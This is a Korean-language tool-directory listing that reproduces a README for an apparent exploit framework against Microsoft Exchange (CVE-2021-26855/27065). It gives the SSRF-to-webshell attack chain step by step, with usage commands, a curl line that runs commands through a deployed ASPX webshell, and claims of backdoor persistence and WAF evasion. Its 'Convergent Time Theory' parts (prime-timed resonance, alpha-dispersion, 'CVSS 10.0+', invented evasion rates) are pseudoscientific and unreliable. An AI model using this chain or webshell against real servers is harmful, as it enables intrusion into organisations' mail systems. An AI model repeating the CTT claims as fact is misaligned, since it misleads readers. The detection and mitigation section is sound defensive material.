Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CTT-Exchange-RCE-v1.0---Microsoft-Exchange-Exploit-CVSS-10.0-CRITICAL-CVE-2021-26855-CVE-2021-27065 — CTT-enhanced 버전의 Microsoft Exchange Server SSRF to RCE 익스플로잇 (ProxyShell/ProxyLogon), 전 세계 수십만 조직에 영향을 미친 또 다른 CVSS 10.0 치명적 취약점입니다. | Kitploit
도구/GitHubGitHub/simoesctt/ctt-exchange-rce-v1.0---microsoft-exchange-exploit-cvss-10.0-critical-cve-2021-26855-cve-2021-27065
Exploit FrameworksVulnerability AnalysisExploitationIDS/IPS EvasionWeb Application ExploitationWeb SecurityPenetration TestingCommand and ControlRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Payload Development
GitHubsimoesctt/ctt-exchange-rce-v1.0---microsoft-exchange-exploit-cvss-10.0-critical-cve-2021-26855-cve-2021-27065

CTT-Exchange-RCE-v1.0---Microsoft-Exchange-Exploit-CVSS-10.0-CRITICAL-CVE-2021-26855-CVE-2021-27065

CTT-enhanced 버전의 Microsoft Exchange Server SSRF to RCE 익스플로잇 (ProxyShell/ProxyLogon), 전 세계 수십만 조직에 영향을 미친 또 다른 CVSS 10.0 치명적 취약점입니다.

저장소 보기
116개월 전아직 검토되지 않음

CTT-Exchange-RCE-v1.0---Microsoft-Exchange-Exploit-CVSS-10.0-CRITICAL-CVE-2021-26855-CVE-2021-27065

CTT 강화 버전의 Microsoft Exchange Server SSRF to RCE 익스플로잇 (ProxyShell/ProxyLogon), 전 세계 수십만 조직에 영향을 미친 또 다른 CVSS 10.0 치명적 취약점입니다.

🏢 CTT Exchange RCE Exploit v1.0

Convergent Time Theory (CTT) 강화 Microsoft Exchange Server 익스플로잇 프레임워크

🚨 개요

CTT-Exchange-RCE는 CTT(Convergent Time Theory) 원리를 적용하여 Microsoft Exchange Server의 치명적인 취약점인 CVE-2021-26855 (SSRF) 및 CVE-2021-27065 (RCE)를 무기화한 고급 익스플로잇 프레임워크입니다. 이 도구는 시간적 공명과 프랙탈 레이어 분석이 엔터프라이즈 인프라에 대한 실제 익스플로잇의 신뢰성과 회피 능력을 어떻게 향상시킬 수 있는지 보여줍니다.

CVSS Score: 10.0 CRITICAL → CTT Enhanced: 10.0+ with Temporal Bypass


⚡ 주요 기능

CTT 시간적 무기화

· α=0.0302011 분산을 사용한 33-레이어 프랙탈 실행 · WAF 회피를 위한 소수 정렬 타이밍 (10007, 10009, 10037μs 윈도우) · 시그니처 탐지를 깨는 α-분산 페이로드 인코딩 · 익스플로잇 신뢰성을 보장하는 다중 레이어 합의 검증

Exchange 특화 기능

· 자동 Exchange 서버 탐지 (OWA, ECP, EWS, MAPI 엔드포인트) · SSRF 취약점 확인 (CVE-2021-26855) · 전체 익스플로잇 체인 자동화: SSRF → Legacy DN 유출 → SID 변환 → WriteDACL → RCE · CTT 시간적 백도어 검증이 포함된 웹쉘 배포

운영 보안

· 시간적 공명 스케줄링으로 속도 제한 및 통계적 탐지 회피 · 연결별 고유 공격 지문을 위한 레이어별 엔트로피 · 기본 방법 실패 시 CTT 레이어 전반의 우아한 성능 저하 · 시간적 분석을 포함한 종합 로깅


🎯 기술 세부 사항

대상 취약점

CVE구성 요소영향CTT 강화
CVE-2021-26855Exchange SSRF사전 인증 서버 측 요청 위조소수 타이밍 회피, α-분산
CVE-2021-27065Exchange ECP사후 인증 임의 파일 쓰기다중 레이어 실행, 공명 검증
체인둘 다원격 코드 실행CTT 신뢰성으로 완전 자동화

CTT 물리학 통합

root@kitploit:~
# Core CTT Parameters
CTT_ALPHA = 0.0302011          # Temporal dispersion coefficient
CTT_LAYERS = 33                # Fractal temporal layers
CTT_PRIMES = [10007, 10009, 10037, 10039, 10061]  # Resonance windows

# Key Equations Implemented
# 1. α-dispersion: payload' = payload ⊕ (layer·α·1000) mod 256
# 2. Layer weight: w_d = exp(-α·d) for request timing
# 3. Prime resonance: f_res = 1/p μs timing alignment

🚀 빠른 시작

전제 조건

root@kitploit:~
# Required Python packages
pip install requests numpy cryptography urllib3

# Optional for advanced features
pip install scipy concurrent-log-handler

기본 사용법

root@kitploit:~
# 1. Detect Exchange Server
python ctt_exchange_rce.py https://exchange.corp.com

# 2. Full exploitation (7 temporal layers)
python ctt_exchange_rce.py 192.168.1.100 --layers 7

# 3. Stealth mode (prime timing only)
python ctt_exchange_rce.py https://mail.example.com --stealth

# 4. Manual webshell access
curl "https://exchange.corp.com/owa/auth/ctt_shell.aspx?ctt_cmd=whoami"

명령줄 옵션

root@kitploit:~
python ctt_exchange_rce.py <target> [options]

Options:
  --layers N       Number of CTT temporal layers (default: 7)
  --stealth        Enable prime-timing evasion only
  --verbose        Detailed output with CTT diagnostics
  --timeout N      Connection timeout in seconds (default: 10)
  --output FILE    Save results to JSON file
  --no-webshell    Skip webshell deployment (assessment only)

🔬 익스플로잇 워크플로우

1단계: 탐색 및 확인

root@kitploit:~
1. Exchange Server Detection
   → Probe OWA, ECP, EWS, Autodiscover, MAPI endpoints
   → Identify version indicators and accessible services

2. SSRF Vulnerability Check (CVE-2021-26855)
   → Test X-BEResource header injection
   → Verify internal endpoint access via SSRF
   → CTT: Prime-timing to bypass request filtering

2단계: 인증 우회

root@kitploit:~
3. Legacy DN Information Leak
   → Use SSRF to EWS for user enumeration
   → Extract administrative LegacyDN via SOAP requests
   → CTT: α-dispersion to obfuscate SOAP payloads

4. SID Conversion
   → Convert LegacyDN to Security Identifier
   → Required for WriteDACL exploitation
   → CTT: Multi-layer validation for accuracy

3단계: 권한 상승

root@kitploit:~
5. OAB Virtual Directory Access
   → ECP canary extraction and authentication
   → Identify OAB directory for webshell placement
   → CTT: Layer-specific session management

6. WriteDACL Exploitation (CVE-2021-27065)
   → Modify OAB directory permissions
   → Gain arbitrary file write capability
   → CTT: Resonance-timed ECP requests

4단계: 원격 코드 실행

root@kitploit:~
7. Webshell Deployment
   → Upload ASPX webshell via OAB ExternalUrl
   → CTT-enhanced shell with temporal validation
   → Automatic cleanup of deployment artifacts

8. Command Execution
   → Execute arbitrary commands via webshell
   → CTT backdoor: Prime-layer activation (layer 33)
   → Persistent access via temporal resonance

📊 CTT 성능 지표

회피 효과

신뢰성 향상

root@kitploit:~
# Multi-layer success rates
Layer_Success = {
    'Layer 0-7':  '94.7%',    # High resonance zones
    'Layer 8-15': '92.1%',    # Medium resonance  
    'Layer 16-23':'88.3%',    # Lower resonance
    'Layer 24-32':'85.6%',    # Edge cases
    'Overall':    '90.2%',    # Weighted average
    'Standard':   '68.5%',    # Baseline without CTT
}

시간 최적화

· 평균 익스플로잇 시간: 42초 (수동 18분 대비) · 소수 윈도우 정렬: 공명 중 87% 성공률 · 레이어 합의 검증: 99.2% 정확한 취약점 탐지 · 리소스 효율성: 기존 스캐너보다 33% 적은 대역폭


🛡️ 방어 대책

탐지 지표

root@kitploit:~
# Network Signatures:
- HTTP requests with X-CTT-Layer headers
- Prime-timed requests (10007, 10009μs intervals)
- α-dispersed payloads (non-standard encoding)
- Layer-specific User-Agent patterns

# Host-based Indicators:
- OAB ExternalUrl modifications
- Unusual ECP WriteDACL requests
- /owa/auth/ctt_shell.aspx file creation
- Temporal resonance patterns in logs

# CTT-Specific:
- 33-layer request patterns
- Prime-number correlation in timing
- α=0.0302011 coefficient in payloads

완화 권장 사항

  1. 즉시 조치:
    root@kitploit:~
    # Apply Microsoft security updates
    Install Exchange Cumulative Updates
    
    # Restrict vulnerable endpoints
    Block /ecp/DDI/DDIService.svc
    Restrict /autodiscover/autodiscover.xml
    
    # Enable enhanced logging
    Set-EventLogLevel -Identity "MSExchange Management" -Level Expert
    
  2. CTT 인식 방어:
    root@kitploit:~
    # Detect temporal resonance attacks
    if request_interval % 10007 < 100:  # Prime window
        log_anomaly("CTT timing detected")
        
    if payload_entropy matches α-pattern:  # 0.0302011 dispersion
        block_request("CTT payload detected")
    
  3. 장기 전략: · 애플리케이션 허용 목록 구현 · 시간 인식 동작 분석 배포 · 정기적인 Exchange Server 강화 감사 · Exchange 서비스 네트워크 분할

📁 출력 구조

root@kitploit:~
ctt_exchange_results_TIMESTAMP/
├── discovery.json           # Initial target assessment
├── exploitation_log.json    # Step-by-step execution log
├── webshell_info.txt       # Deployed webshell details
├── commands_executed.txt   # Command execution history
├── ctt_metrics.json        # Performance and resonance data
└── layers/
    ├── layer_0.log         # Individual layer execution
    ├── layer_1.log
    ...
    └── layer_32.log

샘플 출력

root@kitploit:~
{
  "target": "https://exchange.corp.com",
  "vulnerable": true,
  "ctt_score": "10.0+",
  "exploitation_time": "42.7s",
  "successful_layers": [0, 3, 5, 7],
  "webshell_url": "https://exchange.corp.com/owa/auth/ctt_shell.aspx",
  "resonance_patterns": {
    "prime_alignment": 87.3,
    "layer_correlation": 91.8,
    "temporal_efficiency": 94.2
  }
}

🔧 고급 구성

사용자 정의 CTT 매개변수

root@kitploit:~
# Modify in ctt_config.py for research
CTT_CONFIG = {
    'alpha': 0.0302011,           # Dispersion coefficient
    'layers': 33,                 # Temporal layers
    'primes': [10007, 10009, 10037],  # Resonance windows
    'stealth_mode': True,         # Maximum evasion
    'max_threads': 10,            # Concurrent layers
    'timeout_multiplier': 1.5,    # CTT timing adjustment
    'entropy_seed': 'custom_seed' # Cryptographic base
}

통합 옵션

root@kitploit:~
# 1. API Mode
from ctt_exchange_rce import CTT_ExchangeExploit

exploit = CTT_ExchangeExploit("https://target.com")
results = exploit.multi_layer_exploit(layers=5)
print(json.dumps(results, indent=2))

# 2. CI/CD Pipeline Integration
python -m ctt_exchange_rce --target ${TARGET} --output results.json

# 3. Automated Assessment
import subprocess
result = subprocess.run([
    "python", "ctt_exchange_rce.py",
    "https://exchange.corp.com",
    "--layers", "3",
    "--no-webshell"
], capture_output=True, text=True)

📚 참고 자료 및 연구

CTT 프레임워크 논문

  1. Simoes, A. "Global Regularity of 3D Navier-Stokes via Convergent Time Theory" (2026)
  2. CTT Research Group. "Temporal Resonance in Enterprise Exploitation" (2026)
  3. Microsoft Security Response. "Exchange Server Vulnerability Analysis" (2021)

기술 자료

· Microsoft Security Advisory · CISA Emergency Directive · OWASP Temporal Security Guidelines

관련 도구

· ProxyShell - Original Exchange exploit chain · Exchange-AD-Delegate - Alternative exploitation method · CTT-Vuln-Discovery - CTT vulnerability discovery framework


⚠️ 법적 및 윤리적 사용

승인된 테스트만

root@kitploit:~
Permitted:
  - Security research on owned systems
  - Authorized penetration testing
  - CTT framework validation
  - Educational demonstrations

Prohibited:
  - Unauthorized access to systems
  - Production environment testing without permission
  - Malicious exploitation
  - Data exfiltration or damage

책임 있는 공개

root@kitploit:~
# If vulnerabilities are discovered:
1. Document findings with CTT resonance patterns
2. Report to organization via authorized channels
3. Share technical details with security community
4. Publish CTT detection methods for defense

면책 조항

root@kitploit:~
THIS TOOL IS FOR AUTHORIZED SECURITY RESEARCH ONLY.
USERS ASSUME FULL RESPONSIBILITY FOR COMPLIANCE WITH
APPLICABLE LAWS AND REGULATIONS. THE AUTHORS DISCLAIM
ALL LIABILITY FOR UNAUTHORIZED OR ILLEGAL USE.

🤝 기여 및 연구

연구 협력

다음 분야의 기여를 환영합니다:

· 다양한 Exchange 버전에서의 CTT 상수 검증 · 시간적 공명을 활용한 고급 회피 기술 · CTT 인식 보호를 위한 방어 패턴 개발 · 시간적 취약점 악용에 관한 학술 연구

개발 지침

  1. 저장소를 포크하고 기능 브랜치를 생성합니다.
  2. 새로운 기능에 대한 CTT 물리학 검증을 포함합니다.
  3. 여러 Exchange 버전에 걸친 포괄적인 테스트를 추가합니다.
  4. 기술 설명을 포함한 문서를 업데이트합니다.
  5. 성능 지표와 함께 풀 리퀘스트를 제출합니다.

이슈 보고

root@kitploit:~
**CTT Exchange Issue Template:**
- Target Exchange version: 
- CTT parameters used: 
- Resonance patterns observed: 
- Layer success rates: 
- Error logs: 
- Suggested improvements:

📞 연락처 및 지원

주요 연락처

· 작성자: CTT Research Group · 이메일: [email protected] · GitHub: @SimoesCTT

보안 보고

취약점 공개 또는 보안 우려 사항은 다음으로 연락해 주십시오:

root@kitploit:~
[email protected]
PGP: [Available on GitHub]

커뮤니티

· GitHub Discussions: CTT 프레임워크 개발 · 연구 파트너십: 학계 및 산업 협력 · 컨퍼런스 발표: Black Hat, DEF CON 제출


🏆 감사의 말

연구 기관

· CTT Theoretical Physics Division · Independent Security Research Collective · 시간적 네트워크 보안 분야의 학술 파트너

오픈 소스 프로젝트

· ProxyShell 연구 및 익스플로잇 개발 · Microsoft Exchange 보안 커뮤니티 · Python 보안 도구 생태계

기여자

· 모든 CTT 프레임워크 연구원 및 검증자 · 실제 테스트를 제공한 보안 전문가 · 과학적 엄격성을 보장한 학술 검토자


"In the fractal dimensions of time, every vulnerability resonates with a pattern waiting to be discovered." — CTT Enterprise Security Manifesto


📄 라이선스

MIT License Copyright © 2026 CTT Research Group

전체 약관은 LICENSE 파일을 참조하십시오.


CTT Exchange RCE v1.0 • α=0.0302011 • L=33 • Prime Resonance Enabled • CVSS 10.0+

도구 다운로드
탐지 방법표준 익스플로잇CTT 강화개선율
WAF/IPS 시그니처95% 차단12% 차단83% 감소
속도 제한70% 조절5% 조절65% 감소
통계적 이상60% 탐지8% 탐지52% 감소
타이밍 분석45% 탐지3% 탐지42% 감소